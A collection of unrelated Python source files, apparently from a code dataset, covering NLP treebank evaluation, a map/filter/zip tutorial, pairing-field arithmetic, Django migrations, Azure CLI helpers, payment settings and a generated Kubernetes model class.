if treebank.endswith("/"):
treebank = treebank[:-1]
if treebank.lower() in ('ud_all', 'all_ud'):
ud_treebanks = common.get_ud_treebanks(paths["UDBASE"])
treebanks.extend(ud_treebanks)
else:
treebanks.append(treebank)
for treebank_idx, treebank in enumerate(treebanks):
if treebank_idx > 0:
logger.info("=========================================")
if SHORTNAME_RE.match(treebank):
short_name = treebank
else:
short_name = treebank_to_short_name(treebank)
logger.debug("%s: %s" % (treebank, short_name))
if mode == Mode.TRAIN and not command_args.force and model_name != 'ete':
if command_args.save_dir:
model_path = "%s/%s_%s.pt" % (command_args.save_dir, short_name, model_name)
else:
model_path = "saved_models/%s/%s_%s.pt" % (model_dir, short_name, model_name)
if os.path.exists(model_path):
logger.info("%s: %s exists, skipping!" % (treebank, model_path))
continue
else:
logger.info("%s: %s does not exist, training new model" % (treebank, model_path))
if command_args.temp_output and model_name != 'ete':
with tempfile.NamedTemporaryFile() as temp_output_file:
run_treebank(mode, paths, treebank, short_name,
temp_output_file.name, command_args, extra_args)
else:
run_treebank(mode, paths, treebank, short_name,
None, command_args, extra_args)
def run_eval_script(gold_conllu_file, system_conllu_file, evals=None):
""" Wrapper for lemma scorer. """
gold_ud = ud_eval.load_conllu_file(gold_conllu_file)
system_ud = ud_eval.load_conllu_file(system_conllu_file)
evaluation = ud_eval.evaluate(gold_ud, system_ud)
if evals is None:
return ud_eval.build_evaluation_table(evaluation, verbose=True, counts=False)
else:
results = [evaluation[key].f1 for key in evals]
return " ".join("{:.2f}".format(100 * x) for x in results)
def run_eval_script_tokens(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["Tokens", "Sentences", "Words"])
def run_eval_script_mwt(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["Words"])
def run_eval_script_pos(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["UPOS", "XPOS", "UFeats", "AllTags"])
def run_eval_script_depparse(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["UAS", "LAS", "CLAS", "MLAS", "BLEX"])
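# Usage sketch (the .conllu paths are placeholders, not files shipped with the repo):
# score a predicted CoNLL-U file against gold annotations, either as the full verbose
# table or as a compact string for a chosen subset of metrics.
#
#   table = run_eval_script("gold.conllu", "pred.conllu")
#   las_only = run_eval_script("gold.conllu", "pred.conllu", evals=["LAS"])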
|
py | b414bfb4b3f9d70a8573a87ced57cdbb73d77eec | """Map Filter Zip List Comprehensions
Higher order functions
A function that takes a function as a parameter and/or returns a function as its return value
Example: sorted
map _
|
-- modern alternative -> list comprehensions and generator expressions
|
filter -
The map function
map(func, *iterables)
*iterables -> a variable number of iterable objects
func -> some function that takes as many arguments as there are iterable objects passed to iterables
map(func, *iterables) will then return an iterator that calculates the function applied to each element of the iterables
The iterator stops as soon as one of the iterables has been exhausted, so iterables of unequal length can be used
Examples
"""
l = [2, 3, 4]
def sq(x):
return x**2
list(map(sq, l)) # [4, 9, 16]
l1 = [1, 2, 3]
l2 = [10, 20, 30]
def add(x, y):
return x + y
list(map(add, l1, l2)) # [11, 22, 33]
"""The filter function
filter(func, iterable)
iterable -> a single iterable
func -> some function that takes a single argument
filter(func, iterable) will then return an iterator that contains all the elements of the iterable for which the function called on it is Truthy
If the function is None, it simply returns the elements of iterable that are Truthy
Examples
"""
l = [0, 1, 2, 3, 4] # 0 is Falsey, all the other numbers are Truthy
list(filter(None, l)) # [1, 2, 3, 4]
def is_even(n):
return n % 2 == 0
list(filter(is_even, l)) # [0, 2, 4]
list(filter(lambda n: n % 2 == 0, l)) # [0, 2, 4]
"""The zip function zip(*iterables) # this is not a high order function that takes multiple iterables and return one interable
[1, 2, 3, 4] zip
#--------> (1, 10), (2, 20), (3, 30), (4, 40)
(10, 20, 30, 40)
[1, 2, 3] zip
[10, 20, 30] #--------> (1, 10, 'a'), (2, 20, 'b'), (3, 30, 'c')
['a', 'b', 'c']
[1, 2, 3, 4, 5] zip
#--------> (1, 10), (2, 20), (3, 30)
[10, 20, 30]
Examples
"""
l1 = [1, 2, 3]
l2 = [10, 20, 30, 40]
l3 = 'python'
list(zip(l1, l2, l3)) # [(1, 10, 'p'), (2, 20, 'y'), (3, 30, 't')]
l1 = range(100)
l2 = 'abcd'
list(zip(l1, l2)) # [(0, 'a'), (1, 'b'), (2, 'c'), (3, 'd')]
# List Comprehension Alternative to map
l = [2, 3, 4]
def sq(x):
    return x**2
list(map(sq, l))              # [4, 9, 16]
# equivalently, with a lambda instead of the named function:
list(map(lambda x: x**2, l))  # [4, 9, 16]
result = []
for x in l:
result.append(x**2) # result -> [4, 9, 16]
[x**2 for x in l] # result -> [4, 9, 16]
[<expression> for <varname> in <iterable>]
l1 = [1, 2, 3]
l2 = [10, 20, 30, 40]
list(map(lambda x, y: x + y, l1, l2)) # [11, 22, 33]
# Remember: zip(l1, l2) # [(1, 10), (2, 20), (3, 30)]
[x + y for x, y in zip(l1, l2)] # [11, 22, 33]
l = [1, 2, 3, 4]
list(filter(lambda n: n % 2 == 0, l)) # [2, 4]
[x for x in l if x % 2 == 0] # [2, 4]
[<expression> for <varname> in <iterable> if <condition>]
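# Putting the three together (same toy lists as above): keep only the even pairwise
# sums of l1 and l2, first with map/filter/zip, then as a single list comprehension.
l1 = [1, 2, 3]
l2 = [10, 20, 30]
list(filter(lambda s: s % 2 == 0, map(lambda pair: pair[0] + pair[1], zip(l1, l2))))  # [22]
[x + y for x, y in zip(l1, l2) if (x + y) % 2 == 0]  # [22]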
|
py | b414c02e4130c165ddbc769345ead1ab9241d2f0 | from __future__ import absolute_import
from typing import ( # noqa: F401
cast,
List,
Sequence,
Tuple,
Union,
)
field_modulus = 21888242871839275222246405745257275088696311157297823662689037894645226208583
FQ2_MODULUS_COEFFS = [1, 0]
FQ12_MODULUS_COEFFS = [82, 0, 0, 0, 0, 0, -18, 0, 0, 0, 0, 0] # Implied + [1]
FQ2_MC_TUPLES = [(0, 1)]
FQ12_MC_TUPLES = [(i, c) for i, c in enumerate(FQ12_MODULUS_COEFFS) if c]
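# With the implied leading 1, these are the monic modulus polynomials used to
# reduce products below:
#   FQ2:  u**2 + 1                 (so u**2 == -1)
#   FQ12: w**12 - 18*w**6 + 82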
# Extended euclidean algorithm to find modular inverses for
# integers
def prime_field_inv(a: int, n: int) -> int:
if a == 0:
return 0
lm, hm = 1, 0
low, high = a % n, n
while low > 1:
r = high // low
nm, new = hm - lm * r, high - low * r
lm, low, hm, high = nm, new, lm, low
return lm % n
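# Sanity-check sketch: the inverse satisfies a * inv(a) == 1 (mod n). With a toy
# modulus, 3 * 5 == 15 == 1 (mod 7); the same identity holds modulo field_modulus.
assert prime_field_inv(3, 7) == 5
assert (11 * prime_field_inv(11, field_modulus)) % field_modulus == 1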
IntOrFQ = Union[int, "FQ"]
# A class for field elements in FQ. Wrap a number in this class,
# and it becomes a field element.
class FQ(object):
n = None # type: int
def __init__(self, val: IntOrFQ) -> None:
if isinstance(val, FQ):
self.n = val.n
else:
self.n = val % field_modulus
assert isinstance(self.n, int)
def __add__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n + on) % field_modulus)
def __mul__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n * on) % field_modulus)
def __rmul__(self, other: IntOrFQ) -> "FQ":
return self * other
def __radd__(self, other: IntOrFQ) -> "FQ":
return self + other
def __rsub__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((on - self.n) % field_modulus)
def __sub__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
return FQ((self.n - on) % field_modulus)
    def __mod__(self, other: Union[int, "FQ"]) -> "FQ":
        on = other.n if isinstance(other, FQ) else other
        return FQ(self.n % on)
def __div__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
assert isinstance(on, int)
return FQ(self.n * prime_field_inv(on, field_modulus) % field_modulus)
def __truediv__(self, other: IntOrFQ) -> "FQ":
return self.__div__(other)
def __rdiv__(self, other: IntOrFQ) -> "FQ":
on = other.n if isinstance(other, FQ) else other
assert isinstance(on, int), on
return FQ(prime_field_inv(self.n, field_modulus) * on % field_modulus)
def __rtruediv__(self, other: IntOrFQ) -> "FQ":
return self.__rdiv__(other)
def __pow__(self, other: int) -> "FQ":
if other == 0:
return FQ(1)
elif other == 1:
return FQ(self.n)
elif other % 2 == 0:
return (self * self) ** (other // 2)
else:
return ((self * self) ** int(other // 2)) * self
def __eq__(self, other: IntOrFQ) -> bool: # type:ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
if isinstance(other, FQ):
return self.n == other.n
else:
return self.n == other
def __ne__(self, other: IntOrFQ) -> bool: # type:ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
return not self == other
def __neg__(self) -> "FQ":
return FQ(-self.n)
def __repr__(self) -> str:
return repr(self.n)
def __int__(self) -> int:
return self.n
@classmethod
def one(cls) -> "FQ":
return cls(1)
@classmethod
def zero(cls) -> "FQ":
return cls(0)
# Utility methods for polynomial math
def deg(p: Sequence[IntOrFQ]) -> int:
d = len(p) - 1
while p[d] == 0 and d:
d -= 1
return d
def poly_rounded_div(a: Sequence[IntOrFQ],
b: Sequence[IntOrFQ]) -> Sequence[IntOrFQ]:
dega = deg(a)
degb = deg(b)
temp = [x for x in a]
o = [0 for x in a]
for i in range(dega - degb, -1, -1):
o[i] = int(o[i] + temp[degb + i] * prime_field_inv(int(b[degb]), field_modulus))
for c in range(degb + 1):
temp[c + i] = (temp[c + i] - o[c])
return [x % field_modulus for x in o[:deg(o) + 1]]
# A class for elements in polynomial extension fields
class FQP(object):
degree = 0 # type: int
mc_tuples = None # type: List[Tuple[int, int]]
def __init__(self,
coeffs: Sequence[IntOrFQ],
modulus_coeffs: Sequence[IntOrFQ]=None) -> None:
assert len(coeffs) == len(modulus_coeffs)
self.coeffs = coeffs
# The coefficients of the modulus, without the leading [1]
self.modulus_coeffs = modulus_coeffs
# The degree of the extension field
self.degree = len(self.modulus_coeffs)
def __add__(self, other: "FQP") -> "FQP":
assert isinstance(other, type(self))
return type(self)([
int(x + y) % field_modulus
for x, y
in zip(self.coeffs, other.coeffs)
])
def __sub__(self, other: "FQP") -> "FQP":
assert isinstance(other, type(self))
return type(self)([
int(x - y) % field_modulus
for x, y
in zip(self.coeffs, other.coeffs)
])
    def __mod__(self, other: Union[int, "FQP"]) -> "FQP":
        # modulo is not a meaningful operation on extension-field elements
        raise NotImplementedError("__mod__ is not supported for FQP elements")
def __mul__(self, other: Union[int, "FQP"]) -> "FQP":
if isinstance(other, int):
return type(self)([int(c) * other % field_modulus for c in self.coeffs])
else:
# assert isinstance(other, self.__class__)
b = [0] * (self.degree * 2 - 1)
inner_enumerate = list(enumerate(other.coeffs))
for i, eli in enumerate(self.coeffs):
for j, elj in inner_enumerate:
b[i + j] += int(eli * elj)
# MID = len(self.coeffs) // 2
for exp in range(self.degree - 2, -1, -1):
top = b.pop()
for i, c in self.mc_tuples:
b[exp + i] -= top * c
return type(self)([x % field_modulus for x in b])
def __rmul__(self, other: Union[int, "FQP"]) -> "FQP":
return self * other
def __div__(self, other: Union[int, "FQ", "FQP"]) -> "FQP":
if isinstance(other, int):
return type(self)([
int(c) * prime_field_inv(other, field_modulus) % field_modulus
for c
in self.coeffs
])
else:
assert isinstance(other, type(self))
return self * other.inv()
def __truediv__(self, other: Union[int, "FQ", "FQP"]) -> "FQP":
return self.__div__(other)
def __pow__(self, other: int) -> "FQP":
o = type(self)([1] + [0] * (self.degree - 1))
t = self
while other > 0:
if other & 1:
o = o * t
other >>= 1
t = t * t
return o
# Extended euclidean algorithm used to find the modular inverse
def inv(self) -> "FQP":
lm, hm = [1] + [0] * self.degree, [0] * (self.degree + 1)
low, high = (
# Ignore mypy yelling about the inner types for the lists being incompatible
cast(List[IntOrFQ], list(self.coeffs + [0])), # type: ignore
cast(List[IntOrFQ], list(self.modulus_coeffs + [1])), # type: ignore
)
while deg(low):
r = cast(List[IntOrFQ], poly_rounded_div(high, low))
r += [0] * (self.degree + 1 - len(r))
nm = [x for x in hm]
new = [x for x in high]
# assert len(lm) == len(hm) == len(low) == len(high) == len(nm) == len(new) == self.degree + 1 # noqa: E501
for i in range(self.degree + 1):
for j in range(self.degree + 1 - i):
nm[i + j] -= lm[i] * int(r[j])
new[i + j] -= low[i] * r[j]
nm = [x % field_modulus for x in nm]
new = [int(x) % field_modulus for x in new]
lm, low, hm, high = nm, new, lm, low
return type(self)(lm[:self.degree]) / low[0]
def __repr__(self) -> str:
return repr(self.coeffs)
def __eq__(self, other: "FQP") -> bool: # type: ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
assert isinstance(other, type(self))
for c1, c2 in zip(self.coeffs, other.coeffs):
if c1 != c2:
return False
return True
def __ne__(self, other: "FQP") -> bool: # type: ignore # https://github.com/python/mypy/issues/2783 # noqa: E501
return not self == other
def __neg__(self) -> "FQP":
return type(self)([-c for c in self.coeffs])
@classmethod
def one(cls) -> "FQP":
return cls([1] + [0] * (cls.degree - 1))
@classmethod
def zero(cls) -> "FQP":
return cls([0] * cls.degree)
# The quadratic extension field
class FQ2(FQP):
degree = 2
mc_tuples = FQ2_MC_TUPLES
def __init__(self, coeffs: Sequence[IntOrFQ]) -> None:
super().__init__(coeffs, FQ2_MODULUS_COEFFS)
assert self.degree == 2
assert self.mc_tuples == FQ2_MC_TUPLES
# The 12th-degree extension field
class FQ12(FQP):
degree = 12
mc_tuples = FQ12_MC_TUPLES
def __init__(self, coeffs: Sequence[IntOrFQ]) -> None:
super().__init__(coeffs, FQ12_MODULUS_COEFFS)
assert self.degree == 12
assert self.mc_tuples == FQ12_MC_TUPLES
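# Minimal illustrative smoke test for the classes above (the specific values are
# arbitrary examples); it runs only when this module is executed directly.
if __name__ == "__main__":
    a = FQ(2)
    assert a * prime_field_inv(2, field_modulus) == FQ(1)  # modular inverse
    assert (a + 3) - 3 == a                                # field arithmetic round-trips
    x = FQ2([1, 2])
    assert x / x == FQ2.one()                              # FQP division goes through inv()
    print("field element sanity checks passed")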
|
py | b414c08f52e48a6ef52226bc69040809a7fe7582 | # Generated by Django 2.1.11 on 2019-08-08 18:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b414c0c01ffa27aa92ff8b48eb6056a594e86d92 | import numpy as np
from .freq_filter import freq_filt, gaussian
def bandpass(orig_img: np.ndarray) -> np.ndarray:
"""Bandpass filters image and returns result.
Parameters
----------
orig_img : np.ndarray
original image to bandpass filter
Returns
-------
np.ndarray
bandpass filtered image
"""
    # randomly generate the cutoff frequencies (between 1 and 25)
low_cutoff_freq = np.random.uniform(1, 12.5)
high_cutoff_freq = np.random.uniform(low_cutoff_freq + 5, 25)
# create gaussian transfer function
M, N = orig_img.shape[:2]
transfer_func = gaussian((M * 2, N * 2), high_cutoff_freq) - gaussian(
(M * 2, N * 2), low_cutoff_freq
)
# frequency filter and return image
return freq_filt(orig_img, transfer_func)
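# Illustrative usage (the array shape is an arbitrary example; because of the
# relative import above, this module is meant to be used from within its package):
#   img = np.random.rand(128, 128)
#   filtered = bandpass(img)  # same spatial shape, with a random band of frequencies kept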
|
py | b414c165483c280765c702884f93149289a4c51c | from django import template
from django.template import Library
import six
from django.utils.safestring import mark_safe
from django.utils.html import escape
from xadmin.util import static, vendor as util_vendor
register = Library()
@register.simple_tag(takes_context=True)
def view_block(context, block_name, *args, **kwargs):
if 'admin_view' not in context:
return ""
admin_view = context['admin_view']
nodes = []
method_name = 'block_%s' % block_name
cls_str = str if six.PY3 else basestring
for view in [admin_view] + admin_view.plugins:
if hasattr(view, method_name) and callable(getattr(view, method_name)):
block_func = getattr(view, method_name)
result = block_func(context, nodes, *args, **kwargs)
if result and isinstance(result, cls_str):
nodes.append(result)
if nodes:
return mark_safe(''.join(nodes))
else:
return ""
@register.filter
def admin_urlname(value, arg):
return 'xadmin:%s_%s_%s' % (value.app_label, value.model_name, arg)
static = register.simple_tag(static)
@register.simple_tag(takes_context=True)
def vendor(context, *tags):
return util_vendor(*tags).render()
class BlockcaptureNode(template.Node):
"""https://chriskief.com/2013/11/06/conditional-output-of-a-django-block/"""
def __init__(self, nodelist, varname):
self.nodelist = nodelist
self.varname = varname
def render(self, context):
output = self.nodelist.render(context)
context[self.varname] = escape(output)
return ''
@register.tag(name='blockcapture')
def do_blockcapture(parser, token):
try:
tag_name, args = token.contents.split(None, 1)
except ValueError:
raise template.TemplateSyntaxError("'blockcapture' node requires a variable name.")
nodelist = parser.parse(('endblockcapture',))
parser.delete_first_token()
return BlockcaptureNode(nodelist, args)
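# Illustrative template usage of the tag above (the variable and block names are
# examples only, not taken from an existing template):
#   {% blockcapture sidebar %}{% block sidebar %}{% endblock %}{% endblockcapture %}
#   {% if sidebar %}<aside>{{ sidebar }}</aside>{% endif %}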
|
py | b414c58d62029313e8553063874f449ba0230893 | from functools import singledispatch
from pathlib import Path
from typed_ast import ast3
from paradigm.hints import Namespace
from . import (construction,
conversion)
@singledispatch
def execute(node: ast3.AST,
*,
source_path: Path,
namespace: Namespace) -> None:
raise TypeError('Unsupported node type: {type}.'
.format(type=type(node)))
@execute.register(ast3.stmt)
def execute_statement(node: ast3.stmt,
*,
source_path: Path,
namespace: Namespace) -> None:
execute_tree(construction.from_node(node),
source_path=source_path,
namespace=namespace)
@execute.register(ast3.Module)
def execute_tree(node: ast3.Module,
*,
source_path: Path,
namespace: Namespace) -> None:
code = compile(conversion.typed_to_plain(node), str(source_path), 'exec')
exec(code, namespace)
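# Illustrative usage sketch (the statement, path and variable names are made-up examples):
#   ns: Namespace = {}
#   execute(ast3.parse("x = 1 + 1"), source_path=Path("<example>"), namespace=ns)
#   ns["x"]  # -> 2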
|
py | b414c60c87964322803cc6b50e7488b0ecde7e31 |
import argparse
import subprocess
from os.path import abspath, dirname
BASE_DIR = abspath(dirname(dirname(abspath(__file__))))
def main(args):
assert args.black is not None or args.pylint or args.mypy or args.coverage, \
f'need to specify --black|--pylint|--mypy|--coverage'
commands_list = [f'cd {BASE_DIR}/dev']
if args.black is not None:
if args.black == 'check':
command = f'black --check {BASE_DIR}/nerblackbox'
elif args.black == 'diff':
command = f'black --diff --color {BASE_DIR}/nerblackbox'
elif args.black == 'convert':
command = f'black {BASE_DIR}/nerblackbox'
else:
raise Exception(f'need to specify --black check|diff|convert')
commands_list.append(command)
if args.pylint:
command = f'pylint {BASE_DIR}/nerblackbox'
commands_list.append(command)
if args.mypy:
# --disallow-untyped-calls --disallow-untyped-defs --disallow-incomplete-defs
command = f'mypy --config-file=pyproject.toml {BASE_DIR}/nerblackbox'
commands_list.append(command)
if args.coverage:
command = f'coverage run --source=nerblackbox ' \
f'-m pytest {BASE_DIR}/nerblackbox; ' \
f'coverage html; ' \
f'coverage report'
commands_list.append(command)
commands = ';'.join(commands_list)
print(f'### {commands}')
subprocess.run(commands, shell=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--black', type=str, help='check, diff or convert')
parser.add_argument('--pylint', action='store_true', default=False)
parser.add_argument('--mypy', action='store_true', default=False)
parser.add_argument('--coverage', action='store_true', default=False)
_args = parser.parse_args()
main(_args)
|
py | b414ca0d7fcfc342adeddd96f77263878075c48e | from django.conf import settings
PAGSEGURO_EMAIL = getattr(settings, "PAGSEGURO_EMAIL", "")
PAGSEGURO_TOKEN = getattr(settings, "PAGSEGURO_TOKEN", "")
PAGSEGURO_SANDBOX = getattr(settings, "PAGSEGURO_SANDBOX", True)
PAGSEGURO_LOG_IN_MODEL = getattr(settings, "PAGSEGURO_LOG_IN_MODEL", True)
if PAGSEGURO_SANDBOX:
CHECKOUT_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/checkout"
PAYMENT_URL = "https://sandbox.pagseguro.uol.com.br/v2/checkout/payment.html"
NOTIFICATION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/transactions/notifications"
TRANSACTION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/transactions"
SESSION_URL = "https://ws.sandbox.pagseguro.uol.com.br/v2/sessions/"
else:
CHECKOUT_URL = "https://ws.pagseguro.uol.com.br/v2/checkout"
PAYMENT_URL = "https://pagseguro.uol.com.br/v2/checkout/payment.html"
NOTIFICATION_URL = "https://ws.pagseguro.uol.com.br/v2/transactions/notifications"
TRANSACTION_URL = "https://ws.pagseguro.uol.com.br/v2/transactions"
SESSION_URL = "https://ws.pagseguro.uol.com.br/v2/sessions/"
TRANSACTION_STATUS = {
"1": "aguardando",
"2": "em_analise",
"3": "pago",
"4": "disponivel",
"5": "em_disputa",
"6": "devolvido",
"7": "cancelado",
"8": "debitado",
"9": "retencao_temporaria",
}
|
py | b414ca50df1abce10ed52d3b8703687e6f26fa10 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import batch_write_spans
PROJECT_ID = os.environ["GOOGLE_CLOUD_PROJECT"]
def test_get_trace():
batch_write_spans.batch_write_spans(project_id=PROJECT_ID)
|
py | b414cb073d695f67b11538dc24904eda24f7606e | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.azclierror import (
CLIInternalError
)
def should_load_source(source):
'''Check whether to load `az {source} connection`
If {source} is an extension (e.g, spring-cloud), load the command group only when {source} is installed
:param source: the source resource type
'''
from azure.cli.core.extension.operations import list_extensions
from ._resource_config import SOURCE_RESOURCES_IN_EXTENSION
# names of CLI installed extensions
installed_extensions = [item.get('name') for item in list_extensions()]
# if source resource is released as an extension, load our command groups
# only when the extension is installed
if source not in SOURCE_RESOURCES_IN_EXTENSION or source.value in installed_extensions:
return True
return False
def generate_random_string(length=5, prefix='', lower_only=False, ensure_complexity=False):
'''Generate a random string
:param length: the length of generated random string, not including the prefix
:param prefix: the prefix string
:param lower_only: ensure the generated string only includes lower case characters
:param ensure_complexity: ensure the generated string satisfy complexity requirements
'''
import random
import string
if lower_only and ensure_complexity:
raise CLIInternalError('lower_only and ensure_complexity can not both be specified to True')
if ensure_complexity and length < 8:
raise CLIInternalError('ensure_complexity needs length >= 8')
character_set = string.ascii_letters + string.digits
if lower_only:
character_set = string.ascii_lowercase
while True:
randstr = '{}{}'.format(prefix, ''.join(random.sample(character_set, length)))
lowers = [c for c in randstr if c.islower()]
uppers = [c for c in randstr if c.isupper()]
numbers = [c for c in randstr if c.isnumeric()]
if not ensure_complexity or (lowers and uppers and numbers):
break
return randstr
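# Illustrative calls (the outputs shown are examples only; results are random):
#   generate_random_string(5, prefix='cli')            # e.g. 'cliab3xz'
#   generate_random_string(8, ensure_complexity=True)  # mixes upper case, lower case and digits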
def run_cli_cmd(cmd, retry=0):
'''Run a CLI command
:param cmd: The CLI command to be executed
:param retry: The times to re-try
'''
import json
import subprocess
output = subprocess.run(cmd, shell=True, check=False, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if output.returncode != 0:
if retry:
run_cli_cmd(cmd, retry - 1)
else:
raise CLIInternalError('Command execution failed, command is: '
'{}, error message is: {}'.format(cmd, output.stderr))
return json.loads(output.stdout) if output.stdout else None
def set_user_token_header(client, cli_ctx):
'''Set user token header to work around OBO'''
from azure.cli.core._profile import Profile
# pylint: disable=protected-access
# HACK: set custom header to work around OBO
profile = Profile(cli_ctx=cli_ctx)
creds, _, _ = profile.get_raw_token()
client._client._config.headers_policy._headers['x-ms-serviceconnector-user-token'] = creds[1]
# HACK: hide token header
client._config.logging_policy.headers_to_redact.append('x-ms-serviceconnector-user-token')
return client
|
py | b414cb74ca3a56a0f7a17a757d0ee3dd487ed075 | # Generated by Django 3.1.3 on 2020-12-12 16:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('activities', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Interest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100)),
('completed', models.BooleanField(blank=True, default=False, null=True)),
('description', models.TextField()),
('activities', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='activities.activity')),
],
),
]
|
py | b414cc548864f6f05694f43ecf7d9c5ee66805ff | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1StatefulSetStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'collision_count': 'int',
'conditions': 'list[V1StatefulSetCondition]',
'current_replicas': 'int',
'current_revision': 'str',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int',
'update_revision': 'str',
'updated_replicas': 'int'
}
attribute_map = {
'collision_count': 'collisionCount',
'conditions': 'conditions',
'current_replicas': 'currentReplicas',
'current_revision': 'currentRevision',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas',
'update_revision': 'updateRevision',
'updated_replicas': 'updatedReplicas'
}
def __init__(self, collision_count=None, conditions=None, current_replicas=None, current_revision=None, observed_generation=None, ready_replicas=None, replicas=None, update_revision=None, updated_replicas=None):
"""
V1StatefulSetStatus - a model defined in Swagger
"""
self._collision_count = None
self._conditions = None
self._current_replicas = None
self._current_revision = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self._update_revision = None
self._updated_replicas = None
self.discriminator = None
if collision_count is not None:
self.collision_count = collision_count
if conditions is not None:
self.conditions = conditions
if current_replicas is not None:
self.current_replicas = current_replicas
if current_revision is not None:
self.current_revision = current_revision
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
if update_revision is not None:
self.update_revision = update_revision
if updated_replicas is not None:
self.updated_replicas = updated_replicas
@property
def collision_count(self):
"""
Gets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision.
:return: The collision_count of this V1StatefulSetStatus.
:rtype: int
"""
return self._collision_count
@collision_count.setter
def collision_count(self, collision_count):
"""
Sets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision.
:param collision_count: The collision_count of this V1StatefulSetStatus.
:type: int
"""
self._collision_count = collision_count
@property
def conditions(self):
"""
Gets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state.
:return: The conditions of this V1StatefulSetStatus.
:rtype: list[V1StatefulSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""
Sets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state.
:param conditions: The conditions of this V1StatefulSetStatus.
:type: list[V1StatefulSetCondition]
"""
self._conditions = conditions
@property
def current_replicas(self):
"""
Gets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision.
:return: The current_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._current_replicas
@current_replicas.setter
def current_replicas(self, current_replicas):
"""
Sets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision.
:param current_replicas: The current_replicas of this V1StatefulSetStatus.
:type: int
"""
self._current_replicas = current_replicas
@property
def current_revision(self):
"""
Gets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas).
:return: The current_revision of this V1StatefulSetStatus.
:rtype: str
"""
return self._current_revision
@current_revision.setter
def current_revision(self, current_revision):
"""
Sets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas).
:param current_revision: The current_revision of this V1StatefulSetStatus.
:type: str
"""
self._current_revision = current_revision
@property
def observed_generation(self):
"""
Gets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server.
:return: The observed_generation of this V1StatefulSetStatus.
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""
Sets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server.
:param observed_generation: The observed_generation of this V1StatefulSetStatus.
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""
Gets the ready_replicas of this V1StatefulSetStatus.
